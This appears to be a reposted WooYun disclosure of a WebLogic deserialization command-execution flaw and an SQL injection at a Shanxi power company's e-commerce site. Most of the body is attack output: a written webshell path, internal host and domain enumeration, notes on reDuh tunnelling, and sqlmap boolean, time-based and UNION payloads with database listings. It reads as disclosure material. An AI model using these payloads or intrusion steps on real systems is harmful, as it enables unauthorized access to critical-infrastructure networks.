山西漳泽电力某站点命令执行/SQL注入(影响内网安全)

admin
admin
admin
140559
文章
117
评论
2017年4月12日23:37:59评论548 views字数 247阅读0分49秒阅读模式
摘要

2016-03-31: 细节已通知厂商并且等待厂商处理中
2016-04-04: 厂商已经确认,细节仅向厂商公开
2016-04-14: 细节向核心白帽子及相关领域专家公开
2016-04-24: 细节向普通白帽子公开
2016-05-04: 细节向实习白帽子公开
2016-05-19: 细节向公众公开

漏洞概要 关注数(3) 关注此漏洞

缺陷编号: WooYun-2016-191172

漏洞标题: 山西漳泽电力某站点命令执行/SQL注入(影响内网安全)

相关厂商: 山西漳泽电力股份有限公司

漏洞作者: 路人甲

提交时间: 2016-03-31 21:20

公开时间: 2016-05-19 23:30

漏洞类型: 命令执行

危害等级: 高

自评Rank: 15

漏洞状态: 已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源:www.wooyun.org ,如有疑问或需要帮助请联系

Tags标签: 远程命令执行 SQL注入

0人收藏

漏洞详情

披露状态:

2016-03-31: 细节已通知厂商并且等待厂商处理中
2016-04-04: 厂商已经确认,细节仅向厂商公开
2016-04-14: 细节向核心白帽子及相关领域专家公开
2016-04-24: 细节向普通白帽子公开
2016-05-04: 细节向实习白帽子公开
2016-05-19: 细节向公众公开

简要描述:

漳泽电力

详细说明:

漳泽电力电子商务网

http://**.**.**.**/

weblogic反序列化漏洞

code 区域 
以太网适配器 本地连接 2:
 
    连接特定的 DNS 后缀 . . . . . . . : 
    本地链接 IPv6 地址. . . . . . . . : fe80::7dc9:1f04:7405:173e%13
    IPv4 地址 . . . . . . . . . . . . : **.**.**.**
    子网掩码  . . . . . . . . . . . . : **.**.**.**
    默认网关. . . . . . . . . . . . . : **.**.**.**

写入shell:http://**.**.**.**/Liems/111.jspx

code 区域 
服务器名称            注解
 
 ------------------------------------------
 //AHB-WZ
 //AHB_LHZ
 //AHB_LYJ
 //AHB_LYQ
 //ASB_MXP
 //BGS_CL杨小军         杨小军
 //BGS_LY
 //CHINA-20121030O
 //DQB_MQ               123456
 //GSLD-WSY
 //HP-DFKCFOQQM81X
 //JHB_HP
 //JHB_QPL
 //JHB_RB
 //LENOVO-CF47097F
 //LENOVO-F7918C2C
 //RZB-HH               人事劳动部(黄华)
 //SERVER
 //TYXXPT-SJK
 //ZHKFB-LHS            zhkfb-lhs
 //ZZDL
 //ZZDL-CWB
 命令成功完成。
 >net view /domain
 Domain
 ------------------------------------------
 MSHOME
 WORKGROUP
 ZDZB
 人事劳动部
 新闻中心
 营销部
 命令成功完成。

数据库user与pass相同,翻看了一下数据库,基本上都是五金的订单什么的,没有太多有用的信息

山西漳泽电力某站点命令执行/SQL注入(影响内网安全)

之后使用reduh连接远程,可进行内网渗透

山西漳泽电力某站点命令执行/SQL注入(影响内网安全)

扫描部分内网端口

山西漳泽电力某站点命令执行/SQL注入(影响内网安全)

山西漳泽电力某站点命令执行/SQL注入(影响内网安全)

山西漳泽电力某站点命令执行/SQL注入(影响内网安全)

山西漳泽电力某站点命令执行/SQL注入(影响内网安全)

记着以前乌云上还有一个关于打印机渗透的,找了没找到

山西漳泽电力某站点命令执行/SQL注入(影响内网安全)

数百个公司的联系方式

山西漳泽电力某站点命令执行/SQL注入(影响内网安全)

漏洞证明:

SQl注入

code 区域 
http://**.**.**.**/Liems/portal/detailCgxx.jsp?id=5237&name=ZC&type=ALL

山西漳泽电力某站点命令执行/SQL注入(影响内网安全)

山西漳泽电力某站点命令执行/SQL注入(影响内网安全)

code 区域 
Parameter: #1* (URI)
     Type: boolean-based blind
     Title: AND boolean-based blind - WHERE or HAVING clause
     Payload: http://**.**.**.**:80/Liems/portal/detailCgxx.jsp?id=5237 and 1=1 AND 6894=6894&name=ZC&type=ALL
 
     Type: AND/OR time-based blind
     Title: Oracle AND time-based blind
     Payload: http://**.**.**.**:80/Liems/portal/detailCgxx.jsp?id=5237 and 1=1 AND 6637=DBMS_PIPE.RECEIVE_MESSAGE(CHR(66)||CHR(69)||CHR(118)||CHR(110),5)&name=ZC&type=ALL
 
     Type: UNION query
     Title: Generic UNION query (NULL) - 15 columns
     Payload: http://**.**.**.**:80/Liems/portal/detailCgxx.jsp?id=5237 and 1=-1748 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CHR(113)||CHR(113)||CHR(106)||CHR(112)||CHR(113)||CHR(102)||CHR(77)||CHR(99)||CHR(103)||CHR(85)||CHR(65)||CHR(67)||CHR(67)||CHR(68)||CHR(76)||CHR(118)||CHR(90)||CHR(117)||CHR(81)||CHR(98)||CHR(87)||CHR(82)||CHR(74)||CHR(76)||CHR(99)||CHR(114)||CHR(87)||CHR(103)||CHR(109)||CHR(117)||CHR(112)||CHR(81)||CHR(118)||CHR(83)||CHR(113)||CHR(109)||CHR(120)||CHR(116)||CHR(113)||CHR(80)||CHR(68)||CHR(68)||CHR(115)||CHR(117)||CHR(111)||CHR(113)||CHR(118)||CHR(113)||CHR(107)||CHR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM DUAL-- -&name=ZC&type=ALL
 ---
 web application technology: Servlet 2.5, JSP, JSP 2.1
 back-end DBMS: Oracle
 available databases [19]:
 [*] APEX_030200
 [*] APPQOSSYS
 [*] CTXSYS
 [*] DBSNMP
 [*] EXFSYS
 [*] FLOWS_FILES
 [*] LIEMS5
 [*] MDSYS
 [*] OLAPSYS
 [*] ORDDATA
 [*] ORDSYS
 [*] OUTLN
 [*] OWBSYS
 [*] SCOTT
 [*] SYS
 [*] SYSMAN
 [*] SYSTEM
 [*] WMSYS
 [*] XDB
code 区域 
Database: LIEMS5
 +----------------------------+---------+
 | Table                      | Entries |
 +----------------------------+---------+
 | PGFLBMST                   | 184428  |
 | INTERFACE_REC              | 179147  |
 | PTPTSMST                   | 174297  |
 | POQTVMST                   | 172018  |
 | INTERFACE_PRC              | 158603  |
 | INTERFACE_REQ              | 120547  |
 | ACTIONLOG                  | 119342  |
 | PGPRTORGASSIGN             | 118573  |
 | PGPRTORGLNK                | 118567  |
 | DKONLINEUSERHISMST         | 114881  |
 | BDPRHJMST                  | 91138   |
 | INTERFACE_PLA              | 86087   |
 | INTERFACE_ILD              | 76712   |
 | INTERFACE_POH              | 69817   |
 | BDPDTTYPELIN               | 65958   |
 | INLS_REC                   | 43707   |
 | DKTREEMENUTMP              | 43692   |
 | INLS_PRC                   | 33576   |
 | POPLALIN                   | 31068   |
 | INLS_ILD                   | 29976   |
 | BDWZQDLIN                  | 29685   |
 | POQTLMST                   | 29543   |
 | POQTPMST                   | 25514   |
 | CMPMAMST                   | 24171   |
 | INLS_REQ                   | 24144   |
 | POPOLMST                   | 23627   |
 | DKDOCMST                   | 22602   |
 | PORTLETOBJPRE              | 22417   |
 | INLS_POH                   | 20025   |
 | BDSYGYSLIN                 | 19862   |
 | INTERFACE_PMA              | 17973   |
 | DKFLDMST                   | 17491   |
 | PTPARTORGLINK              | 15874   |
 | BDZZFILEMST                | 13377   |
 | MSMENUOPERMST              | 12613   |
 | PORTLETOBJECT              | 11214   |
 | BDTODOMST                  | 8144    |
 | INLS_PTS                   | 7648    |
 | PGPRTLIN                   | 7636    |
 | BDVENBMMST                 | 7031    |
 | LPNOTEBOOKMST              | 6391    |
 | DKROLEPERLNK               | 6319    |
 | POPOHMST                   | 6189    |
 | BDCGYTODOMST               | 5801    |
 | POPLAMST                   | 5792    |
 | BDXMLXMST                  | 5780    |
 | POQTHMST                   | 5687    |
 | POQTOMST                   | 5501    |
 | PGMSGMST                   | 5434    |
 | BDZBGGMST                  | 5045    |
 | PGPGMMST                   | 4606    |
 | BDWEBTBRMST                | 4353    |
 | BDCGQDLIN                  | 3778    |
 | PGLIMITPERMST              | 3385    |
 | PORTALTAB                  | 2901    |
 | PORTAL                     | 2774    |
 | PORTALROLE                 | 2774    |
 | CMEMPMST                   | 2718    |
 | CMEMPPOSMST                | 2690    |
 | DKPERSTLIN                 | 2502    |
 | PGPRTMST                   | 2387    |
 | DKKJGROUPMST               | 2360    |
 | QUVDVENMST                 | 2294    |
 | PGSGPLNK                   | 1904    |
 | BDVENBGHISMST              | 1596    |
 | COPY_EM_PGPGMMST           | 1485    |
 | MSOPTMST                   | 1301    |
 | DKPOPMST                   | 1239    |
 | DKRELMST                   | 1179    |
 | PGSGRMST                   | 1155    |
 | DKSEQMST                   | 1038    |
 | DKTBLMST                   | 1029    |

修复方案:

修复吧

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:12

确认时间:2016-04-04 23:24

厂商回复:

最新状态:

暂无

漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):

登陆后才能进行评分

评价

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin